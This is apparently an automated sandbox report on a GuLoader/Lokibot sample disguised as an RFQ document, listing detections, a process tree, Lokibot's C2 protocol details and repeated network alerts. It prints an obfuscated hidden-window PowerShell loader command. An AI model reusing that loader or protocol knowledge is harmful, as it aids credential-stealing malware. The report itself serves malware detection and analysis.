Edit tour

Windows Analysis Report
RFQ-SulselBarruII2-COALCOMMLDOC.exe

Overview

General Information

Sample name:	RFQ-SulselBarruII2-COALCOMMLDOC.exe
Analysis ID:	1419146
MD5:	90fda5c072fe00e8e737606add7f1276
SHA1:	68752dce786a29b815ec5454d4b4aa5f6bc73363
SHA256:	c384d26e83f585fbadd73e6cea441d1479d68de5bb647f775b506e5eab7f3230
Tags:	exeLoki
Infos:

Detection

GuLoader, Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected GuLoader

Yara detected Lokibot

Initial sample is a PE file and has a suspicious name

Obfuscated command line found

Powershell drops PE file

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Potential Dosfuscation Activity

Sleep loop found (likely to delay execution)

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

RFQ-SulselBarruII2-COALCOMMLDOC.exe (PID: 6744 cmdline: "C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe" MD5: 90FDA5C072FE00E8E737606ADD7F1276)

powershell.exe (PID: 5688 cmdline: "powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd';$Omkldningsrums=$Harish116.SubString(61425,3);.$Omkldningsrums($Harish116)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7200 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

wab.exe (PID: 7448 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 7456 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 7464 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 7472 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 7480 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 7488 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 7496 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 7504 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 7512 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 7520 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 7528 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

ImagingDevices.exe (PID: 7536 cmdline: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" MD5: 3F6F254D24C457BF33227502ED4F0988)

ImagingDevices.exe (PID: 7544 cmdline: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" MD5: 3F6F254D24C457BF33227502ED4F0988)

ImagingDevices.exe (PID: 7552 cmdline: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" MD5: 3F6F254D24C457BF33227502ED4F0988)

ImagingDevices.exe (PID: 7560 cmdline: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" MD5: 3F6F254D24C457BF33227502ED4F0988)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000013.00000002.2864657089.0000000003E01000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000001.00000002.1926920759.0000000008EBA000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: ImagingDevices.exe PID: 7560	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: ImagingDevices.exe PID: 7560	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5688, TargetFilename: C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe

Sigma detected: Potential Dosfuscation Activity

Source: Process started

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd';$Omkldningsrums=$Harish116.SubString(61425,3);.$Omkldningsrums($Harish116)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5688, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 7200, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd';$Omkldningsrums=$Harish116.SubString(61425,3);.$Omkldningsrums($Harish116)", CommandLine: "powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd';$Omkldningsrums=$Harish116.SubString(61425,3);.$Omkldningsrums($Harish116)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe", ParentImage: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe, ParentProcessId: 6744, ParentProcessName: RFQ-SulselBarruII2-COALCOMMLDOC.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd';$Omkldningsrums=$Harish116.SubString(61425,3);.$Omkldningsrums($Harish116)", ProcessId: 5688, ProcessName: powershell.exe

Snort Signatures

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:05.256073
SID:	2825766
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:13.658001
SID:	2024318
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:07.360242
SID:	2825766
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:41.484457
SID:	2021641
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:43.987496
SID:	2024318
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:34.282252
SID:	2021641
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:26.534492
SID:	2025381
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:48.379699
SID:	2025381
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:38.419517
SID:	2024313
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:43.987496
SID:	2024313
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:10.724952
SID:	2024318
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:36.358340
SID:	2021641
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:39.122189
SID:	2021641
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:55.534565
SID:	2825766
Source Port:	49854
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:30.613047
SID:	2025381
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:38.419517
SID:	2024318
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:56.219175
SID:	2021641
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:10.724952
SID:	2024313
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:13.658001
SID:	2024313
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:38.407237
SID:	2825766
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:08.198877
SID:	2021641
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:21.763703
SID:	2025381
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:03.254673
SID:	2024318
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:51.813478
SID:	2025381
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:52.772037
SID:	2025381
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:32.914570
SID:	2024313
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:54.009985
SID:	2025381
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:28.593679
SID:	2021641
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:15.179954
SID:	2021641
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:56.609631
SID:	2025381
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:29.987306
SID:	2825766
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:03.254673
SID:	2024313
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:00.331066
SID:	2825766
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:33.600213
SID:	2825766
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:32.914570
SID:	2024318
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:46.959263
SID:	2021641
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:33.093731
SID:	2021641
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:12.911562
SID:	2025381
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:28.125041
SID:	2024313
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:28.125041
SID:	2024318
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:12.218805
SID:	2021641
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:49.748494
SID:	2825766
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:32.267354
SID:	2825766
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:27.224947
SID:	2024318
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:15.873778
SID:	2025381
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:25.036535
SID:	2021641
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:27.224947
SID:	2024313
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:52.638175
SID:	2021641
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:54.842169
SID:	2024313
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:24.205256
SID:	2825766
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:35.452745
SID:	2021641
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:19.372255
SID:	2025381
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:47.778229
SID:	2025381
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:40.106892
SID:	2021641
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:54.842169
SID:	2024318
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:37.043826
SID:	2025381
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:49.062804
SID:	2024318
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:28.952090
SID:	2021641
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:01.015339
SID:	2021641
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:54.423488
SID:	2825766
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:27.904801
SID:	2825766
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:57.435447
SID:	2021641
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:46.022620
SID:	2825766
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:49.062804
SID:	2024313
Source Port:	49845
Destination Port:	80
Protocol:	TCP
